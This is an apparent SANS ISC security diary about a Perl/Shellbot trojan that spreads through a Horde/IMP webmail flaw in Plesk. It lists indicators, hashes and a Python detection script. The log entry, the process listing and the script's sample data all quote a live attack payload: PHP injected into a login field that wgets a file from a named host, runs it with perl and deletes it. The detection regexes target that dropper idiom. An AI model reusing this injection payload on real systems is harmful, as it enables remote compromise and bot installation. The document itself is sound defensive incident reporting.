Active Perl/Shellbot Trojan

Published: 2013-10-26
Last Updated: 2013-10-26 23:55:43 UTC
by Guy Bruneau (Version: 2)
2 comment(s)

ISC received a submission from Zach of a Perl/Shellbot.B trojan served from fallencrafts[.]info/download/himad.png [1]. The trojan has limited detection on VirusTotal [2]. The script contains a "hostauth" value of sosick[.]net [3], and the IRC server that compromised systems connect to is located at 89.248.172.144. From what we have so far, it appears to be exploiting an older version of Plesk.

Update

This bot exploits a vulnerability in the Horde/IMP webmail bundled with Plesk. You might want to review your system logs for signs of the server attempting to connect outbound to fallencrafts[.]info, which appears to be exploiting a Plesk vulnerability [4] and possibly another [5], and for activity involving 93.174.88.125, the source of the login attempt shown below, an address for which a lot of activity has been reported to DShield over the past 3 days [6].

Oct 26 11:58:33 HORDE [error] [imp] FAILED LOGIN 93.174.88.125 to localhost:143[imap/notls] as <?php passthru("cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*"); ?>@xxxxxxxxx.net [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]

If a system is compromised, you are likely to see Apache processes similar to these:

apache   10760  0.0  0.0  10816  1084 ?        S    11:09   0:00 sh -c cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*
apache   10761  0.0  0.0  42320  1392 ?        S    11:09   0:00 wget http://fallencrafts.info/download/himad.png

md5: bca0b2a88338427ba2e8729e710122cd  himad.png
sha-256: 07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9  himad.png
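The log review and process check described above can be scripted. The following Python is an added example, not code from the diary or from ISC: it scans Horde/IMP FAILED LOGIN lines for PHP injected into the username and for the fetch-then-interpret dropper idiom, flags `ps aux` rows owned by the web-server account that run that idiom or fetch from the named host, and compares file contents against the published hashes. The sample log and process lines are constructed from the entries quoted above plus invented benign rows; the set of web-server account names is an assumption.

```python
import hashlib
import re
from urllib.parse import urlparse

# Indicators quoted in the diary.
KNOWN_MD5 = {"bca0b2a88338427ba2e8729e710122cd"}
KNOWN_SHA256 = {"07f968e3996994465f0ec642a5104c0a81b75b0b0ada4005c8c9e3cfb0c51ff9"}
KNOWN_HOSTS = {"fallencrafts.info", "sosick.net"}
KNOWN_IPS = {"89.248.172.144", "93.174.88.125"}
WEB_USERS = {"apache", "www-data", "nobody", "httpd"}  # assumption: typical web-server accounts

# Horde/IMP failed-login line: "... FAILED LOGIN <client-ip> to <server> as <username> [on line ..."
HORDE_FAILED = re.compile(
    r"HORDE \[error\] \[imp\] FAILED LOGIN (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) "
    r"to (?P<server>\S+) as (?P<user>.*?) \[on line"
)
PHP_TAG = re.compile(r"<\?php", re.IGNORECASE)
# A fetch tool followed later on the same command line by an interpreter: the dropper idiom.
DROPPER = re.compile(r"\b(?:wget|curl|fetch)\b.*\b(?:perl|sh|bash|python)\b", re.IGNORECASE)
URL = re.compile(r"https?://[^\s\"';)]+")


def _hosts(text):
    """Hostnames of every URL found in text."""
    hosts = set()
    for u in URL.findall(text):
        h = urlparse(u).hostname
        if h:
            hosts.add(h)
    return hosts


def scan_horde_log(lines):
    """One finding per FAILED LOGIN line whose username carries a payload or
    whose client IP / URL host is a known indicator."""
    findings = []
    for line in lines:
        m = HORDE_FAILED.search(line)
        if not m:
            continue
        user, ip = m.group("user"), m.group("ip")
        reasons = []
        if PHP_TAG.search(user):
            reasons.append("php-tag-in-username")
        if DROPPER.search(user):
            reasons.append("download-and-execute")
        hosts = _hosts(user)
        if hosts & KNOWN_HOSTS:
            reasons.append("known-host")
        if ip in KNOWN_IPS:
            reasons.append("known-ip")
        if reasons:
            findings.append({"ip": ip, "hosts": sorted(hosts), "reasons": reasons})
    return findings


def scan_processes(ps_lines):
    """(pid, command) for `ps aux` rows owned by a web-server account that run
    the dropper idiom or fetch from a known host."""
    flagged = []
    for line in ps_lines:
        fields = line.split(None, 10)  # ps aux: 10 fixed columns, then the command
        if len(fields) < 11 or fields[0] not in WEB_USERS:
            continue
        pid, cmd = fields[1], fields[10]
        if DROPPER.search(cmd) or _hosts(cmd) & KNOWN_HOSTS:
            flagged.append((pid, cmd))
    return flagged


def known_hash_matches(data):
    """Which of the published hashes the given file contents match."""
    matches = []
    if hashlib.md5(data).hexdigest() in KNOWN_MD5:
        matches.append("md5")
    if hashlib.sha256(data).hexdigest() in KNOWN_SHA256:
        matches.append("sha256")
    return matches


# Constructed sample input: the diary's log entry plus an ordinary failed login.
SAMPLE_LOG = [
    'Oct 26 11:58:33 HORDE [error] [imp] FAILED LOGIN 93.174.88.125 to localhost:143[imap/notls] '
    'as <?php passthru("cd /var/tmp;cd /var/tmp;wget http://fallencrafts.info/download/himad.png;'
    'perl himad.png;rm -rf himad.png*"); ?>@xxxxxxxxx.net [on line 258 of '
    '"/usr/share/psa-horde/imp/lib/Auth/imp.php"]',
    'Oct 26 12:01:07 HORDE [error] [imp] FAILED LOGIN 192.0.2.10 to localhost:143[imap/notls] '
    'as alice@example.org [on line 258 of "/usr/share/psa-horde/imp/lib/Auth/imp.php"]',
]
# Constructed sample input: the diary's two process rows plus two benign ones.
SAMPLE_PS = [
    "apache   10760  0.0  0.0  10816  1084 ?        S    11:09   0:00 sh -c cd /var/tmp;cd /var/tmp;"
    "wget http://fallencrafts.info/download/himad.png;perl himad.png;rm -rf himad.png*",
    "apache   10761  0.0  0.0  42320  1392 ?        S    11:09   0:00 wget http://fallencrafts.info/download/himad.png",
    "apache   10762  0.0  0.1  52100  4100 ?        S    11:09   0:00 /usr/sbin/httpd -DFOREGROUND",
    "root      2201  0.0  0.0  42320  1392 ?        S    10:55   0:00 wget http://mirror.example.org/updates.tar.gz",
]

if __name__ == "__main__":
    for f in scan_horde_log(SAMPLE_LOG):
        print("LOG ", f)
    for pid, cmd in scan_processes(SAMPLE_PS):
        print("PROC", pid, cmd)
```

Point it at the real Horde log and at `ps aux` output on the server, and feed the bytes of anything left in /var/tmp to known_hash_matches. The PHP tag check is the durable one: the username field of a login failure should never contain code, so it keeps firing after the dropper hostnames and hashes change.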

[1] https://dns.robtex.com/fallencrafts.info.html#graph
[2] https://www.virustotal.com/en/url/79654fc688b48211ccc24a14d815c41dba0b1dfbefc2c51d38ed88b481242e9b/analysis/1382747124/
[3] https://dns.robtex.com/sosick.net.html#records
[4] http://kb.parallels.com/en/113374
[5] http://kb.parallels.com/en/116241
[6] https://isc.sans.edu/ipdetails.html?ip=93.174.88.125

-----------

Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu
